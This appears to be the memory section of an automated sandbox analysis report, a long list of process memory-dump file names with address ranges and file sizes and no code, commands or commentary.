                                                                                                                                                                                                                                                                                                                                    • memory/2248-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1.5MB

                                                                                                                                                                                                                                                                                                                                    • memory/2248-143-0x000000006B280000-0x000000006B2A6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      152KB

                                                                                                                                                                                                                                                                                                                                    • memory/2248-133-0x000000006B440000-0x000000006B4CF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      572KB

                                                                                                                                                                                                                                                                                                                                    • memory/2348-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2372-619-0x000001D681C40000-0x000001D681CB2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                                                                                                                    • memory/2380-609-0x000001AF4DB60000-0x000001AF4DBD2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                                                                                                                    • memory/2436-252-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2436-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2488-522-0x0000000005230000-0x0000000005231000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2560-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2580-561-0x0000022DFA370000-0x0000022DFA3E2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                                                                                                                    • memory/2644-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2644-246-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                                                                    • memory/2836-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2896-230-0x000000001B2B0000-0x000000001B2B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/2896-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2896-208-0x0000000000660000-0x0000000000661000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2896-224-0x0000000000B70000-0x0000000000B71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2960-362-0x00000000014F0000-0x0000000001506000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                                                                                                                    • memory/2992-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3040-294-0x0000000000400000-0x0000000000437000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      220KB

                                                                                                                                                                                                                                                                                                                                    • memory/3040-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3040-290-0x0000000000030000-0x0000000000038000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                                                                    • memory/3040-292-0x00000000001C0000-0x00000000001C9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                                                                                                                    • memory/3056-200-0x00000000006D0000-0x00000000006D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3056-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3056-228-0x0000000004EC0000-0x0000000004EC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3056-220-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3056-235-0x0000000005530000-0x0000000005531000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3056-231-0x0000000004E60000-0x0000000004ED6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                                                                                                                                    • memory/3068-275-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3076-232-0x0000000006BD0000-0x0000000006BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-206-0x0000000000D40000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-415-0x0000000000CE3000-0x0000000000CE4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-223-0x0000000000CE0000-0x0000000000CE1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3076-190-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-216-0x0000000006D60000-0x0000000006D61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-391-0x000000007E940000-0x000000007E941000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-194-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-215-0x0000000000CE2000-0x0000000000CE3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3076-315-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3080-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3084-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3100-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3308-575-0x0000017F148D0000-0x0000017F14942000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                                                                                                                    • memory/3308-572-0x0000017F14810000-0x0000017F1485D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      308KB

                                                                                                                                                                                                                                                                                                                                    • memory/3428-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3500-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3612-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3644-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3724-221-0x0000000004602000-0x0000000004603000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-192-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-238-0x0000000007950000-0x0000000007951000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-268-0x0000000008100000-0x0000000008101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-236-0x0000000007720000-0x0000000007721000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-417-0x0000000004603000-0x0000000004604000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-242-0x00000000079C0000-0x00000000079C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-388-0x000000007EC00000-0x000000007EC01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-225-0x0000000004600000-0x0000000004601000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-265-0x00000000078D0000-0x00000000078D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-195-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-314-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3724-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3788-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3944-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3944-262-0x00000000006B0000-0x00000000006B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/3960-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4024-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4092-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4104-507-0x0000000001370000-0x0000000001371000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4168-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4168-305-0x0000000000710000-0x0000000000711000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4168-327-0x000000001B160000-0x000000001B162000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4200-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4240-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4240-346-0x0000000005860000-0x0000000005861000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4248-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4280-309-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4280-332-0x000000001AF00000-0x000000001AF02000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4280-313-0x0000000000140000-0x0000000000141000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4292-310-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4292-348-0x0000000004EB0000-0x0000000004EB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4428-317-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4428-364-0x0000000005150000-0x0000000005151000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4492-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4500-505-0x0000000005750000-0x0000000005751000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4516-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4580-328-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4600-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4640-518-0x0000000000400000-0x0000000002B63000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      39.4MB

                                                                                                                                                                                                                                                                                                                                    • memory/4640-515-0x0000000002C20000-0x0000000002CCE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                                                                                                                    • memory/4640-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4688-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4756-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4772-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4776-343-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4808-568-0x0000000003390000-0x00000000033ED000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      372KB

                                                                                                                                                                                                                                                                                                                                    • memory/4808-564-0x0000000004CD6000-0x0000000004DD7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/4916-352-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4952-354-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5024-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5060-511-0x0000000002C60000-0x0000000002C61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/5076-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5076-375-0x000000001B7E0000-0x000000001B7E2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/5328-558-0x0000015FE6170000-0x0000015FE61E2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      456KB